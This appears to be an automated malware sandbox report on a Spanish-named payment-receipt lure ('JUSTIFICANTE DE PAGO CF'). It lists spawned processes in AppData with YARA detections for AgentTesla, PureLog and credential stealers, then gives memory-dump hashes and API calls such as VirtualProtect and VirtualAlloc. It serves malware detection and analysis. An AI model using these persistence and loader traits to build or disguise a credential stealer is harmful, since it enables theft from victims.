                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:21:09:11
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                                                                              Imagebase:0x5c0000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2237006260.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2237006260.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2233090518.000000000296E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2233090518.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2233090518.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 34%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:21:09:13
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Imagebase:0xc30000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.000000000311A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3213952954.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:9
                                                                              Start time:21:09:19
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Reramvw.exe"
                                                                              Imagebase:0x30000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2328135287.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2334210822.00000000037C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2328135287.000000000256E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2334210822.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.2328135287.000000000276F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:21:09:23
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0xb10000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3215330801.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:11
                                                                              Start time:21:09:29
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\repeat\repeat.exe"
                                                                              Imagebase:0x360000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2413286495.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2408937601.000000000288F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2408937601.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.0000000002717000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2413286495.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2408937601.000000000268E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:21:09:31
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Imagebase:0xc10000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.000000000305E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.000000000308A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.3213471421.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false


                                                                                Execution Graph

                                                                                Execution Coverage:7.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$TJbq$Te]q$paq$xb`q
                                                                                • API String ID: 0-1123639052
                                                                                • Opcode ID: 8330800df786e41bf7396996304978e5ce84c1f7d1885e010279887e2a67a781
                                                                                • Instruction ID: 1a3c90b7cba9564ef74889dca6c8489f0852d436c4b68c12e420ac6cab4a650a
                                                                                • Opcode Fuzzy Hash: 8330800df786e41bf7396996304978e5ce84c1f7d1885e010279887e2a67a781
                                                                                • Instruction Fuzzy Hash: 15423935A005159FCB15CFA8C984E59BBB2FF89714F1581A8E50AEB272DB31EC52CF80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 15cbe98-15cbf19 VirtualProtect 430 15cbf1b-15cbf21 427->430 431 15cbf22-15cbf47 427->431 430->431
                                                                                APIs
                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 015CBF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 674f697aa69f257aaaa1976b5914bc8e575290889d52887c5892951a8df42c8c
                                                                                • Instruction ID: 6c03b33534ea85f838d60850ff49ddad1959f8717bc48819229c647a70646c70
                                                                                • Opcode Fuzzy Hash: 674f697aa69f257aaaa1976b5914bc8e575290889d52887c5892951a8df42c8c
                                                                                • Instruction Fuzzy Hash: 001106B1D002099FDB10DFAAC485AEEFBF5FF88720F10842AD519A7250C779A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 964 15cc928-15cc9a0 VirtualAlloc 967 15cc9a9-15cc9ce 964->967 968 15cc9a2-15cc9a8 964->968 968->967
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 015CC993
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 79db1f8b2eeecc01515865cb170dbc95c4ff04105205caf678917b32bb58952f
                                                                                • Instruction ID: b8e81dbfbb10373bad518f85194a09dad2548f79d1474b75a4443536be3da4ec
                                                                                • Opcode Fuzzy Hash: 79db1f8b2eeecc01515865cb170dbc95c4ff04105205caf678917b32bb58952f
                                                                                • Instruction Fuzzy Hash: 4A1134758002099FDB10DFAAC844AEEFFF5FF88720F208819D519AB250CB79A540CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1126 157d030-157d042 1127 157d0d3-157d0da 1126->1127 1128 157d048 1126->1128 1129 157d04a-157d056 1127->1129 1128->1129 1130 157d0df-157d0e4 1129->1130 1131 157d05c-157d07e 1129->1131 1130->1131 1133 157d080-157d09f call 15cc2e0 1131->1133 1134 157d0e9-157d0fe 1131->1134 1137 157d0a3-157d0b3 1133->1137 1138 157d0b5-157d0bd 1134->1138 1137->1138 1139 157d10b 1137->1139 1140 157d100-157d109 1138->1140 1141 157d0bf-157d0d0 1138->1141 1140->1141
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991738792.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_157d000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7bfe981f48884b8967cc2ac46e5a06c1556d1ede5498b4f80e0208627c2a646c
                                                                                • Instruction ID: f898b41af2d7edae1cf57b32de153565ddb1ef33bd688421fc67b2fd241afa32
                                                                                • Opcode Fuzzy Hash: 7bfe981f48884b8967cc2ac46e5a06c1556d1ede5498b4f80e0208627c2a646c
                                                                                • Instruction Fuzzy Hash: C1210072504204DFCB16DF58E985B2ABFB5FF88310F20C569E9090F246D33AD806CAA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1144 157d006-157d042 1145 157d0d3-157d0da 1144->1145 1146 157d048 1144->1146 1147 157d04a-157d056 1145->1147 1146->1147 1148 157d0df-157d0e4 1147->1148 1149 157d05c-157d07e 1147->1149 1148->1149 1151 157d080-157d09f call 15cc2e0 1149->1151 1152 157d0e9-157d0fe 1149->1152 1155 157d0a3-157d0b3 1151->1155 1156 157d0b5-157d0bd 1152->1156 1155->1156 1157 157d10b 1155->1157 1158 157d100-157d109 1156->1158 1159 157d0bf-157d0d0 1156->1159 1158->1159
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991738792.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_157d000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 92cd032caa07775bf81e6a565927a32c8e8eb5ce45695d1d4006e121a70b7de8
                                                                                • Instruction ID: 8f24cac8f9988e67edb76820ef2774b05a2312dc7ad179343b1eb2afd5a2e1ed
                                                                                • Opcode Fuzzy Hash: 92cd032caa07775bf81e6a565927a32c8e8eb5ce45695d1d4006e121a70b7de8
                                                                                • Instruction Fuzzy Hash: 57214D755093C08FDB03CF64D990715BF71AF46214F1981EAD9848F567C239981ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b24262be749f675ae5f1eef10fe7c51211185a5ead07d461ff340c7f4b57e4c9
                                                                                • Instruction ID: b25cbc7455e287ce5f224b8c8bf89644707b455bc2e4cdf90be21c3c7e997a98
                                                                                • Opcode Fuzzy Hash: b24262be749f675ae5f1eef10fe7c51211185a5ead07d461ff340c7f4b57e4c9
                                                                                • Instruction Fuzzy Hash: 8A2108B4A04255CFCB55CF68C888A99BBF6FF49315F0444A9D849AB355C734AE82CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9399cc8208aec5b0f73ac1e5002ae23b6a877cb33055c13ed1fc1107e379ebab
                                                                                • Instruction ID: 6e67898fad7b9f7217ec6df8a2a7237e48bd5800cf15ef887dd64bf0be1bae64
                                                                                • Opcode Fuzzy Hash: 9399cc8208aec5b0f73ac1e5002ae23b6a877cb33055c13ed1fc1107e379ebab
                                                                                • Instruction Fuzzy Hash: 1301D374E04269CFDB50DF28D868799B7B6FB89301F0444A5D90DA7380C7786E85CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e38f53e5038d5c2cfc51d33dd980da22a8f1f1a788b2acdb2b9122e612a2e3b3
                                                                                • Instruction ID: 2c8b0e70150f6ddcbfd6451ef0f9fe8f548e8bc7b968142ffd36e9f3074bc2c1
                                                                                • Opcode Fuzzy Hash: e38f53e5038d5c2cfc51d33dd980da22a8f1f1a788b2acdb2b9122e612a2e3b3
                                                                                • Instruction Fuzzy Hash: FEF06D71D06015CBEFA4AB18D9006E9B378FB89351F0504F6C91EAB282D7358E838F92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 240924923a6529823da071fc8ee8c7613c31bd5f14cc0c9efdbeac4f5f0a3a08
                                                                                • Instruction ID: 54f2132a9cad13d2a0de2afc71cf3c1d3898c7814b52490e809e01425bdfae2c
                                                                                • Opcode Fuzzy Hash: 240924923a6529823da071fc8ee8c7613c31bd5f14cc0c9efdbeac4f5f0a3a08
                                                                                • Instruction Fuzzy Hash: FF015474A0021ACFDB94DF58D858B99B7F2FB48301F1481E9D589A7385DB345D84CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 869fd959cb28f6c44589ea7f7e6e853207bdfe998583a1e42c250a4027e6b010
                                                                                • Instruction ID: c2ce83f4917897efe38d6dec8922816d135f801831f82217f941c141317f3699
                                                                                • Opcode Fuzzy Hash: 869fd959cb28f6c44589ea7f7e6e853207bdfe998583a1e42c250a4027e6b010
                                                                                • Instruction Fuzzy Hash: 2DF0F4B4A01259CFDB94DF58D859A9EB7B6FB88301F0040E9E50DA7380CB385D85CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d316e8833847ccd688bfddc2fc3bb56c67ee6b0b58f1cfecc10a2a20dbf801ff
                                                                                • Instruction ID: eefd8a9daa76a3088d74dc7383a971b15dd80cb8a7da42a54be0720039c8de61
                                                                                • Opcode Fuzzy Hash: d316e8833847ccd688bfddc2fc3bb56c67ee6b0b58f1cfecc10a2a20dbf801ff
                                                                                • Instruction Fuzzy Hash: EAF0EDB0A0020ACBCB84DF18C8846AABBF1BB4D310F0A42B5C44DA7280C7389D818F81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 496977a6b9475b6c77e6f59897567bb2ddae9ebdde40d6311d2c776bbd5b234f
                                                                                • Instruction ID: b897cff71ad54b896d3ab03656402eca6043fcc2122a54b78fdf698cba0bff7b
                                                                                • Opcode Fuzzy Hash: 496977a6b9475b6c77e6f59897567bb2ddae9ebdde40d6311d2c776bbd5b234f
                                                                                • Instruction Fuzzy Hash: 78F03970A0221B8FE7529F28D865B9A7BE2FB56304F0410A9840D9B7D2EB344A82CB11
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1997850727.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7190000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1991858187.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_15c0000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4']q$4']q
                                                                                • API String ID: 0-3120983240
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:13.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:173
                                                                                Total number of Limit Nodes:19

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254643713.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6410000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3254799140.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6420000_JUSTIFICANTE DE PAGO CF.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0641FEC2
                                                                                Memory Dump Source
